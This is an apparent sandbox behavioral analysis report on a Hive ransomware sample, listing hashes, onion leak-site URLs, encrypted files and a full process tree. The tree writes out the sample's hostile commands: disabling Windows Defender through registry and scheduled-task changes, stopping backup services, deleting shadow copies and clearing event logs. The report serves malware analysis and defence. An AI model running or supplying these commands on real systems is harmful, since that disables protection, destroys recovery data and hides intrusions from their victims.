Analysis
max time kernel: 249s
max time network: 192s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 19:26
Static task: static1
Behavioral task: behavioral1
Sample: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
Resource: win7-en-20211208
General
Target: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
Size: 3.1MB
MD5: f5d7efaec3c1274b0aaa704a6caa1671
SHA1: ec5c25e1cee1dca5c75baf5a6e3bec69441959dc
SHA256: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d
SHA512: dab0a8060e9012706ae6ba46adeb2f18e5edecdc187e856989236dd0edb46ed7912cee97cee1c9fb075724c5d736b07e418991d1a3793bee6770d51618dd607f
Malware Config
Extracted
C:\Program Files\7-Zip\GyDM_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
pid 1496, process MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
Modifies security service 2 TTPs 1 IoCs
Processes: reg.exe
description: Set value (int); ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"; process: reg.exe
Clears Windows event logs 1 TTPs
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory 64 IoCs
Processes: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe (the process column is this sample for every entry below)
File opened for modification: C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-256_altform-unplated.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Failed.m4a
File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\gl_60x42.png
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_kv9Nv_CNrH80.jhps7
File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_LSN7vgJSg6g0.jhps7
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeWideTile.scale-150.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sMVkP1NPZso0.jhps7
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\GyDM_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_s2_hMgOyzJc0.jhps7
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim2.sad.scale-200.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-96_altform-unplated.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-400.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_u20freu1K1A0.jhps7
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_zKwDXLNIbTg0.jhps7
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-200.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30_altform-unplated.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_KgwdRolNN7Q0.jhps7
File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-white_scale-125.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.scale-125.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_v479qaNH8wY0.jhps7
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_5k0lcdEwqAg0.jhps7
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\GyDM_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-200.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-200.png
File opened for modification: C:\Program Files\Windows Mail\en-US\msoeres.dll.mui
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_freecell.jpg
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookSmallTile.scale-125.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60.png
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_opXLKsWzlOU0.jhps7
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_9RyT3Iu5DpM0.jhps7
File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8oDcoUIAlmg0.jhps7
File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\beer.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_bUnJ5rFiI500.jhps7
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Yj2jYxo9xW00.jhps7
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Xg25oex9Nls0.jhps7
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-pl.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_gdPn1VxxTSI0.jhps7
File opened for modification: C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sb4odawn_Tc0.jhps7
File opened for modification: C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxManifest.xml
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_SNQAZIWfGI80.jhps7
File opened for modification: C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_46NHKIJyPm80.jhps7
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorMedTile.contrast-white_scale-200.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_XKl21rT2vHI0.jhps7
File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_VnwmtVJie2E0.jhps7
File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ss_60x42.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\RadialControl\Rotate_E7AD_HC_64x64.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\Logo.scale-100.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8LZ7MFiTx8o0.jhps7
File created: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\GyDM_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\GameModeTripeaks.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-125.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Flag.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\iheart-radio.scale-150.png
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Common Files\microsoft shared\ink\es-ES\FlickLearningWizard.exe.mui
File opened for modification: C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui
File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_onKnrY9HHIo0.jhps7
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_WZ5an1CMDXY0.jhps7
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid 3512, process vssadmin.exe
Modifies registry class 3 IoCs
Processes: reg.exe (×3)
description: Key deleted; ioc: \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP; process: reg.exe
description: Key deleted; ioc: \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP; process: reg.exe
description: Key deleted; ioc: \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP; process: reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes: powershell.exe (×2), 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
pid 1764, process powershell.exe (3 events)
pid 3388, process powershell.exe (3 events)
pid 3480, process 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe (2 events)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: wevtutil.exe (×3), wmic.exe (×2)
Token privileges enabled, grouped by pid and process (each privilege listed is one IoC row in the original table):
pid 3496, wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
pid 528, wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
pid 3616, wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
pid 4080, wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
pid 3120, wmic.exe (first sequence): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
pid 3120, wmic.exe (second sequence): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe, net.exe (×9)
Each line below reads "pid process -> target pid target process (number of identical rows in the original table)":
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 1292 net.exe (3)
1292 net.exe -> 3484 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 1248 net.exe (3)
1248 net.exe -> 2548 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 3700 net.exe (3)
3700 net.exe -> 2500 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 3652 net.exe (3)
3652 net.exe -> 3268 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 2688 net.exe (3)
2688 net.exe -> 2112 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 328 net.exe (3)
328 net.exe -> 1788 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 3328 net.exe (3)
3328 net.exe -> 3872 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 3676 net.exe (3)
3676 net.exe -> 956 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 60 net.exe (3)
60 net.exe -> 1300 net1.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 948 sc.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 2380 sc.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 2356 sc.exe (3)
3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -> 1848 sc.exe (1)
Processes
Process tree (indentation shows parent/child depth; each entry reads "[PID] image path: command line (signatures hit)"):
- [PID 3480] C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe: "C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe" (Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory)
  - [PID 1292] C:\Windows\SysWOW64\net.exe: net.exe stop "SamSs" /y (Suspicious use of WriteProcessMemory)
    - [PID 3484] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "SamSs" /y
  - [PID 1248] C:\Windows\SysWOW64\net.exe: net.exe stop "SDRSVC" /y (Suspicious use of WriteProcessMemory)
    - [PID 2548] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "SDRSVC" /y
  - [PID 3700] C:\Windows\SysWOW64\net.exe: net.exe stop "SstpSvc" /y (Suspicious use of WriteProcessMemory)
    - [PID 2500] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "SstpSvc" /y
  - [PID 3652] C:\Windows\SysWOW64\net.exe: net.exe stop "UI0Detect" /y (Suspicious use of WriteProcessMemory)
    - [PID 3268] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "UI0Detect" /y
  - [PID 2688] C:\Windows\SysWOW64\net.exe: net.exe stop "vmicvss" /y (Suspicious use of WriteProcessMemory)
    - [PID 2112] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "vmicvss" /y
  - [PID 328] C:\Windows\SysWOW64\net.exe: net.exe stop "VSS" /y (Suspicious use of WriteProcessMemory)
    - [PID 1788] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "VSS" /y
  - [PID 3328] C:\Windows\SysWOW64\net.exe: net.exe stop "wbengine" /y (Suspicious use of WriteProcessMemory)
    - [PID 3872] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "wbengine" /y
  - [PID 3676] C:\Windows\SysWOW64\net.exe: net.exe stop "WebClient" /y (Suspicious use of WriteProcessMemory)
    - [PID 956] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "WebClient" /y
  - [PID 60] C:\Windows\SysWOW64\net.exe: net.exe stop "UnistoreSvc_13561" /y (Suspicious use of WriteProcessMemory)
    - [PID 1300] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop "UnistoreSvc_13561" /y
  - [PID 948] C:\Windows\SysWOW64\sc.exe: sc.exe config "SamSs" start= disabled
  - [PID 2380] C:\Windows\SysWOW64\sc.exe: sc.exe config "SDRSVC" start= disabled
  - [PID 2356] C:\Windows\SysWOW64\sc.exe: sc.exe config "SstpSvc" start= disabled
  - [PID 1848] C:\Windows\SysWOW64\sc.exe: sc.exe config "UI0Detect" start= disabled
  - [PID 4048] C:\Windows\SysWOW64\sc.exe: sc.exe config "vmicvss" start= disabled
  - [PID 1772] C:\Windows\SysWOW64\sc.exe: sc.exe config "VSS" start= disabled
  - [PID 3128] C:\Windows\SysWOW64\sc.exe: sc.exe config "wbengine" start= disabled
  - [PID 3004] C:\Windows\SysWOW64\sc.exe: sc.exe config "WebClient" start= disabled
  - [PID 1324] C:\Windows\SysWOW64\sc.exe: sc.exe config "UnistoreSvc_13561" start= disabled
  - [PID 1524] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - [PID 1384] C:\Windows\SysWOW64\reg.exe: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - [PID 2132] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - [PID 3196] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - [PID 2676] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - [PID 1680] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - [PID 2860] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - [PID 2884] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - [PID 2668] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - [PID 2548] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - [PID 1548] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - [PID 2500] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - [PID 600] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - [PID 2112] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - [PID 3040] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - [PID 2864] C:\Windows\SysWOW64\reg.exe: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - [PID 364] C:\Windows\SysWOW64\schtasks.exe: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - [PID 684] C:\Windows\SysWOW64\schtasks.exe: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - [PID 1992] C:\Windows\SysWOW64\schtasks.exe: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - [PID 332] C:\Windows\SysWOW64\schtasks.exe: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - [PID 2556] C:\Windows\SysWOW64\schtasks.exe: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - [PID 3952] C:\Windows\SysWOW64\reg.exe: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - [PID 2120] C:\Windows\SysWOW64\reg.exe: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - [PID 2224] C:\Windows\SysWOW64\reg.exe: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - [PID 3132] C:\Windows\SysWOW64\reg.exe: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f (Modifies registry class)
  - [PID 3124] C:\Windows\SysWOW64\reg.exe: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f (Modifies registry class)
  - [PID 1520] C:\Windows\SysWOW64\reg.exe: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f (Modifies registry class)
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2276
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3536
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3204
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4020
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3824 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:952
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3512 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3496 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:528 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616 -
